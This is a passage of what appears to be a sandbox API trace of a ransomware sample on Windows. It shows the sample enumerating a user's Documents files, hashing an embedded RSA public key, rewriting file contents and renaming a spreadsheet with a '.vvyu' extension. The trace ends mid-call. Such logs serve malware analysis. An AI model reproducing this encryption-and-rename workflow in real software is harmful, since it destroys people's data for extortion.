[0194.172] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e914a8 | out: hHeap=0x620000) returned 1 [0194.172] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x100) returned 0x2e95ea0 [0194.172] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78a50 | out: hHeap=0x620000) returned 1 [0194.172] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4c) returned 0x2ccac90 [0194.172] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x2c78a50 [0194.172] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x100) returned 0x2e95b88 [0194.172] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x2c78ad0 [0194.172] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc) returned 0x2ea2a80 [0194.172] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78ad0 | out: hHeap=0x620000) returned 1 [0194.172] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x2c78ad0 [0194.172] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x2c78ab0 [0194.172] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x2c78a90 [0194.172] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x2c78aa0 [0194.172] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x2c78a40 [0194.172] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x2c78ae0 [0194.173] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x2c78a30 [0194.173] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc) returned 0x2ea2a98 [0194.173] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78ab0 | out: hHeap=0x620000) returned 1 [0194.173] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x8) returned 0x2c78ab0 [0194.173] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78ad0 | out: hHeap=0x620000) returned 1 [0194.173] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x2c78ad0 [0194.173] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x2c78b10 [0194.173] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x2c78af0 [0194.173] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x2c78b00 [0194.173] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x10) returned 0x2ea2ab0 [0194.173] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78af0 | out: hHeap=0x620000) returned 1 [0194.173] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x18) returned 0x2c85d88 [0194.173] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78b10 | out: hHeap=0x620000) returned 1 [0194.173] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc) returned 0x2ea2ac8 [0194.173] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78b00 | out: hHeap=0x620000) returned 1 [0194.173] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x10) returned 0x2ea2ae0 [0194.173] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78ad0 | out: hHeap=0x620000) returned 1 [0194.173] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x8) returned 0x2c78ad0 [0194.173] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78ae0 | out: hHeap=0x620000) returned 1 [0194.173] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc) returned 0x2ea2af8 [0194.173] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78ad0 | out: hHeap=0x620000) returned 1 [0194.173] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc) returned 0x2ea2b10 [0194.174] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78a90 | out: hHeap=0x620000) returned 1 [0194.174] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x10) returned 0x2ea2b28 [0194.174] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea2b10 | out: hHeap=0x620000) returned 1 [0194.174] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x10) returned 0x2ea2b10 [0194.174] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea2af8 | out: hHeap=0x620000) returned 1 [0194.174] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x8) returned 0x2c78a90 [0194.174] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78a50 | out: hHeap=0x620000) returned 1 [0194.174] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x14) returned 0x2c85d48 [0194.174] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78a90 | out: hHeap=0x620000) returned 1 [0194.174] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x1c) returned 0x2e83cf0 [0194.174] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea2a98 | out: hHeap=0x620000) returned 1 [0194.174] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x10) returned 0x2ea2a98 [0194.174] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78ab0 | out: hHeap=0x620000) returned 1 [0194.174] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x204) returned 0x2ea3a68 [0194.174] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea2a80 | out: hHeap=0x620000) returned 1 [0194.174] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x108) returned 0x2c998c8 [0194.174] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea2b28 | out: hHeap=0x620000) returned 1 [0194.174] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x210) returned 0x2ea3c78 [0194.174] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e83cf0 | out: hHeap=0x620000) returned 1 [0194.174] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x10c) returned 0x2c99af8 [0194.174] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78aa0 | out: hHeap=0x620000) returned 1 [0194.175] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x108) returned 0x2c99d28 [0194.175] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea2a98 | out: hHeap=0x620000) returned 1 [0194.175] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x200) returned 0x2ea3e90 [0194.175] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c998c8 | out: hHeap=0x620000) returned 1 [0194.175] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x100) returned 0x2e95d98 [0194.175] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78a70 | out: hHeap=0x620000) returned 1 [0194.176] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x67c168 | out: hHeap=0x620000) returned 1 [0194.176] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e95ea0 | out: hHeap=0x620000) returned 1 [0194.176] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e95d98 | out: hHeap=0x620000) returned 1 [0194.176] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c85d48 | out: hHeap=0x620000) returned 1 [0194.176] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c99d28 | out: hHeap=0x620000) returned 1 [0194.177] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea3c78 | out: hHeap=0x620000) returned 1 [0194.177] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea3e90 | out: hHeap=0x620000) returned 1 [0194.178] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c99af8 | out: hHeap=0x620000) returned 1 [0194.178] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78a40 | out: hHeap=0x620000) returned 1 [0194.178] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea2b10 | out: hHeap=0x620000) returned 1 [0194.178] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78a30 | out: hHeap=0x620000) returned 1 [0194.178] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea2ae0 | out: hHeap=0x620000) returned 1 [0194.178] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c85d88 | out: hHeap=0x620000) returned 1 [0194.178] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea2ab0 | out: hHeap=0x620000) returned 1 [0194.178] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea2ac8 | out: hHeap=0x620000) returned 1 [0194.179] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e93a80 | out: hHeap=0x620000) returned 1 [0194.179] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2cd95d8 | out: hHeap=0x620000) returned 1 [0194.179] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e95fa8 | out: hHeap=0x620000) returned 1 [0194.179] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x657270 | out: hHeap=0x620000) returned 1 [0194.180] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea0de0 | out: hHeap=0x620000) returned 1 [0194.180] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea3a68 | out: hHeap=0x620000) returned 1 [0194.180] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e95b88 | out: hHeap=0x620000) returned 1 [0194.181] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ccac90 | out: hHeap=0x620000) returned 1 [0194.181] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c99c10 | out: hHeap=0x620000) returned 1 [0194.181] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c85dc8 | out: hHeap=0x620000) returned 1 [0194.181] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78ac0 | out: hHeap=0x620000) returned 1 [0194.181] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c85da8 | out: hHeap=0x620000) returned 1 [0194.181] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c3a670 | out: hHeap=0x620000) returned 1 [0194.182] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e912b0 | out: hHeap=0x620000) returned 1 [0194.182] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2cd9648 | out: hHeap=0x620000) returned 1 [0194.182] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2d0d410 | out: hHeap=0x620000) returned 1 [0194.182] WriteFile (in: hFile=0x568, lpBuffer=0x2ea79b0*, nNumberOfBytesToWrite=0x4be1, lpNumberOfBytesWritten=0x312fb14, lpOverlapped=0x0 | out: lpBuffer=0x2ea79b0*, lpNumberOfBytesWritten=0x312fb14*=0x4be1, lpOverlapped=0x0) returned 1 [0194.183] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea79b0 | out: hHeap=0x620000) returned 1 [0194.183] SetFilePointerEx (in: hFile=0x568, liDistanceToMove=0x4be6, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0194.183] WriteFile (in: hFile=0x568, lpBuffer=0x2e95c90*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x312fb50, lpOverlapped=0x0 | out: lpBuffer=0x2e95c90*, lpNumberOfBytesWritten=0x312fb50*=0x100, lpOverlapped=0x0) returned 1 [0194.184] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e95c90 | out: hHeap=0x620000) returned 1 [0194.184] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x60) returned 0x2cb45f0 [0194.184] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x428) returned 0x2ea3a68 [0194.184] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="uyKE3UuexCE2KAbQ1PTkFn73qJrKsQWCvyN1YHYt", cchWideChar=-1, lpMultiByteStr=0x2ea3a68, cbMultiByte=1064, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="uyKE3UuexCE2KAbQ1PTkFn73qJrKsQWCvyN1YHYt", lpUsedDefaultChar=0x0) returned 41 [0194.184] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x430) returned 0x2ea3e98 [0194.184] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea3a68 | out: hHeap=0x620000) returned 1 [0194.184] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2cb45f0 | out: hHeap=0x620000) returned 1 [0194.185] WriteFile (in: hFile=0x568, lpBuffer=0x2ea3e98*, nNumberOfBytesToWrite=0x28, lpNumberOfBytesWritten=0x312fb50, lpOverlapped=0x0 | out: lpBuffer=0x2ea3e98*, lpNumberOfBytesWritten=0x312fb50*=0x28, lpOverlapped=0x0) returned 1 [0194.185] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea3e98 | out: hHeap=0x620000) returned 1 [0194.185] lstrlenA (lpString="{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}") returned 38 [0194.185] WriteFile (in: hFile=0x568, lpBuffer=0x504448*, nNumberOfBytesToWrite=0x26, lpNumberOfBytesWritten=0x312fb50, lpOverlapped=0x0 | out: lpBuffer=0x504448*, lpNumberOfBytesWritten=0x312fb50*=0x26, lpOverlapped=0x0) returned 1 [0194.185] CloseHandle (hObject=0x568) returned 1 [0194.187] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x70) returned 0x2c7cf30 [0194.187] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x880) returned 0x2ea3a68 [0194.187] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c7cf30 | out: hHeap=0x620000) returned 1 [0194.187] MoveFileW (lpExistingFileName="C:\\Users\\kEecfMwgj\\Documents\\T_CIyr3B-hwvI5YqWU4.ods" (normalized: "c:\\users\\keecfmwgj\\documents\\t_ciyr3b-hwvi5yqwu4.ods"), lpNewFileName="C:\\Users\\kEecfMwgj\\Documents\\T_CIyr3B-hwvI5YqWU4.ods.vvyu" (normalized: "c:\\users\\keecfmwgj\\documents\\t_ciyr3b-hwvi5yqwu4.ods.vvyu")) returned 1 [0194.188] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea3a68 | out: hHeap=0x620000) returned 1 [0194.189] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2cd9610 | out: hHeap=0x620000) returned 1 [0194.189] VirtualFree (lpAddress=0x2900000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0194.192] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c7cd50 | out: hHeap=0x620000) returned 1 [0194.192] FindNextFileW (in: hFindFile=0x2cfe100, lpFindFileData=0x312fba4 | out: lpFindFileData=0x312fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xc9fd7ba0, ftCreationTime.dwHighDateTime=0x1d896fb, ftLastAccessTime.dwLowDateTime=0x8255f1d0, ftLastAccessTime.dwHighDateTime=0x1d8a4eb, ftLastWriteTime.dwLowDateTime=0x8255f1d0, ftLastWriteTime.dwHighDateTime=0x1d8a4eb, nFileSizeHigh=0x0, nFileSizeLow=0x147dc, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="wnP_mIiKwB9aJXHHeZ.ots", cAlternateFileName="WNP_MI~1.OTS")) returned 1 [0194.192] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x40) returned 0x2ea0de0 [0194.192] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x70) returned 0x2c7cd50 [0194.192] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea0de0 | out: hHeap=0x620000) returned 1 [0194.192] PathFindExtensionW (pszPath="C:\\Users\\kEecfMwgj\\Documents\\wnP_mIiKwB9aJXHHeZ.ots") returned=".ots" [0194.192] CreateFileW (lpFileName="C:\\Users\\kEecfMwgj\\Documents\\wnP_mIiKwB9aJXHHeZ.ots" (normalized: "c:\\users\\keecfmwgj\\documents\\wnp_miikwb9ajxhhez.ots"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x568 [0194.193] GetFileSizeEx (in: hFile=0x568, lpFileSize=0x312fb40 | out: lpFileSize=0x312fb40*=83932) returned 1 [0194.193] VirtualAlloc (lpAddress=0x0, dwSize=0x25815, flAllocationType=0x1000, flProtect=0x4) returned 0x2900000 [0194.196] SetFilePointerEx (in: hFile=0x568, liDistanceToMove=0x147b6, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0194.196] ReadFile (in: hFile=0x568, lpBuffer=0x2900000, nNumberOfBytesToRead=0x26, lpNumberOfBytesRead=0x312fb78, lpOverlapped=0x0 | out: lpBuffer=0x2900000*, lpNumberOfBytesRead=0x312fb78*=0x26, lpOverlapped=0x0) returned 1 [0194.198] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x30) returned 0x2cd9610 [0194.198] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2cd9610 | out: hHeap=0x620000) returned 1 [0194.198] SetFilePointer (in: hFile=0x568, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0194.198] ReadFile (in: hFile=0x568, lpBuffer=0x2900000, nNumberOfBytesToRead=0x25805, lpNumberOfBytesRead=0x312fb70, lpOverlapped=0x0 | out: lpBuffer=0x2900000*, lpNumberOfBytesRead=0x312fb70*=0x147dc, lpOverlapped=0x0) returned 1 [0194.199] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA6Rpr555pjA\\/rRQ04gINW\\\\nyfjAZBx4tSyxjhPxyhCThnyGX1R4Ctr4xlU5tMmmPUFsfuUDU5lGuviI94N1wbON\\\\nVaQGY7iaD+q8ohUqZM67L+pFOnn1yIjPM7ut9007Awts+x6O3MEv\\/CKueJ4JdGlD\\\\nooUsYQf078+ERSOfrPWJxayAFK5UfS1lylrtD0OwOxYXiJb9K9atd46qDvj\\/RweK\\\\nGVkzHgynHb2M8A+s10VR7v1a6nJ9rGFO5Z0Jdttak4ws29fs5J3ZQfzq8Axr9+lw\\\\nIQEOxvWOTURN+BgOwCA0vL7Ie5Kedwp7VaByxdM4gbVgWOmkeu1ABtXNM+p3T9P6\\\\nVwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 492 [0194.200] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x1f1) returned 0x2e912b0 [0194.200] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA6Rpr555pjA\\/rRQ04gINW\\\\nyfjAZBx4tSyxjhPxyhCThnyGX1R4Ctr4xlU5tMmmPUFsfuUDU5lGuviI94N1wbON\\\\nVaQGY7iaD+q8ohUqZM67L+pFOnn1yIjPM7ut9007Awts+x6O3MEv\\/CKueJ4JdGlD\\\\nooUsYQf078+ERSOfrPWJxayAFK5UfS1lylrtD0OwOxYXiJb9K9atd46qDvj\\/RweK\\\\nGVkzHgynHb2M8A+s10VR7v1a6nJ9rGFO5Z0Jdttak4ws29fs5J3ZQfzq8Axr9+lw\\\\nIQEOxvWOTURN+BgOwCA0vL7Ie5Kedwp7VaByxdM4gbVgWOmkeu1ABtXNM+p3T9P6\\\\nVwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 492 [0194.200] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA6Rpr555pjA\\/rRQ04gINW\\\\nyfjAZBx4tSyxjhPxyhCThnyGX1R4Ctr4xlU5tMmmPUFsfuUDU5lGuviI94N1wbON\\\\nVaQGY7iaD+q8ohUqZM67L+pFOnn1yIjPM7ut9007Awts+x6O3MEv\\/CKueJ4JdGlD\\\\nooUsYQf078+ERSOfrPWJxayAFK5UfS1lylrtD0OwOxYXiJb9K9atd46qDvj\\/RweK\\\\nGVkzHgynHb2M8A+s10VR7v1a6nJ9rGFO5Z0Jdttak4ws29fs5J3ZQfzq8Axr9+lw\\\\nIQEOxvWOTURN+BgOwCA0vL7Ie5Kedwp7VaByxdM4gbVgWOmkeu1ABtXNM+p3T9P6\\\\nVwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 492 [0194.200] CryptAcquireContextW (in: phProv=0x312fa50, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x312fa50*=0x67c168) returned 1 [0194.201] CryptCreateHash (in: hProv=0x67c168, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x312fa58 | out: phHash=0x312fa58) returned 1 [0194.201] CryptHashData (hHash=0x2cfe140, pbData=0x2e912b0, dwDataLen=0x1f1, dwFlags=0x0) returned 1 [0194.201] CryptGetHashParam (in: hHash=0x2cfe140, dwParam=0x2, pbData=0x0, pdwDataLen=0x312fa54, dwFlags=0x0 | out: pbData=0x0, pdwDataLen=0x312fa54) returned 1 [0194.201] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x11) returned 0x2c85dc8 [0194.201] CryptGetHashParam (in: hHash=0x2cfe140, dwParam=0x2, pbData=0x2c85dc8, pdwDataLen=0x312fa54, dwFlags=0x0 | out: pbData=0x2c85dc8, pdwDataLen=0x312fa54) returned 1 [0194.201] GetLastError () returned 0x0 [0194.201] CryptDestroyHash (hHash=0x2cfe140) returned 1 [0194.201] CryptReleaseContext (hProv=0x67c168, dwFlags=0x0) returned 1 [0194.202] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e912b0 | out: hHeap=0x620000) returned 1 [0194.202] UuidCreate (in: Uuid=0x312fa48 | out: Uuid=0x312fa48) returned 0x0 [0194.202] UuidToStringA (in: Uuid=0x312fa48, StringUuid=0x312fa40 | out: StringUuid=0x312fa40) returned 0x0 [0194.202] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x30) returned 0x2cd9648 [0194.202] RpcStringFreeA (in: String=0x312fa40 | out: String=0x312fa40) returned 0x0 [0194.202] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2cd9610 | out: hHeap=0x620000) returned 1 [0194.202] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x30) returned 0x2cd9610 [0194.202] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x147e0) returned 0x2ea79b0 [0194.202] SetFilePointer (in: hFile=0x568, lDistanceToMove=5, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x5 [0194.203] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2cd9648 | out: hHeap=0x620000) returned 1 [0194.203] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x1f0) returned 0x2d0d410 [0194.203] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x30) returned 0x2cd9648 [0194.203] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x1f0) returned 0x2e912b0 [0194.203] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x58) returned 0x2c3a670 [0194.203] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x40) returned 0x2ea0de0 [0194.203] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc) returned 0x657270 [0194.203] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x40) returned 0x2ea0e28 [0194.203] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc) returned 0x2ea2a80 [0194.203] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc) returned 0x2ea2a98 [0194.203] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc) returned 0x2ea2ab0 [0194.203] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc) returned 0x2ea2ac8 [0194.203] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x24) returned 0x2cff270 [0194.203] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x158) returned 0x2e98a80 [0194.204] RtlReAllocateHeap (Heap=0x620000, Flags=0x0, Ptr=0x2e98a80, Size=0x218) returned 0x2e9aa80 [0194.204] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x558) returned 0x2ea3a68 [0194.204] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea2a98 | out: hHeap=0x620000) returned 1 [0194.204] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea2ac8 | out: hHeap=0x620000) returned 1 [0194.204] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea2ab0 | out: hHeap=0x620000) returned 1 [0194.204] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2cff270 | out: hHeap=0x620000) returned 1 [0194.204] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea3a68 | out: hHeap=0x620000) returned 1 [0194.205] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc) returned 0x2ea2ab0 [0194.205] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x8) returned 0x2c78ac0 [0194.205] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x10) returned 0x2ea2ac8 [0194.205] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x18) returned 0x2c85da8 [0194.205] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x9) returned 0x2ea2a98 [0194.205] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x8) returned 0x2c78a30 [0194.205] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x10e) returned 0x2c99c10 [0194.205] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x2e83cf0 [0194.205] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x58) returned 0x2c3a5b0 [0194.205] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x14) returned 0x2c85dc8 [0194.205] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x104) returned 0x2c99af8 [0194.205] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x14) returned 0x2c85d88 [0194.205] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x2c78a40 [0194.205] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c99c10 | out: hHeap=0x620000) returned 1 [0194.205] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea2ac8 | out: hHeap=0x620000) returned 1 [0194.206] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78a30 | out: hHeap=0x620000) returned 1 [0194.206] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea2a98 | out: hHeap=0x620000) returned 1 [0194.206] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c85da8 | out: hHeap=0x620000) returned 1 [0194.206] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78ac0 | out: hHeap=0x620000) returned 1 [0194.206] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea2ab0 | out: hHeap=0x620000) returned 1 [0194.206] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e83cf0 | out: hHeap=0x620000) returned 1 [0194.206] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c3a670 | out: hHeap=0x620000) returned 1 [0194.207] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e9aa80 | out: hHeap=0x620000) returned 1 [0194.207] GetCurrentThreadId () returned 0x66c [0194.207] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x100) returned 0x2e95c90 [0194.207] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x82) returned 0x2e9fbf0 [0194.207] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, 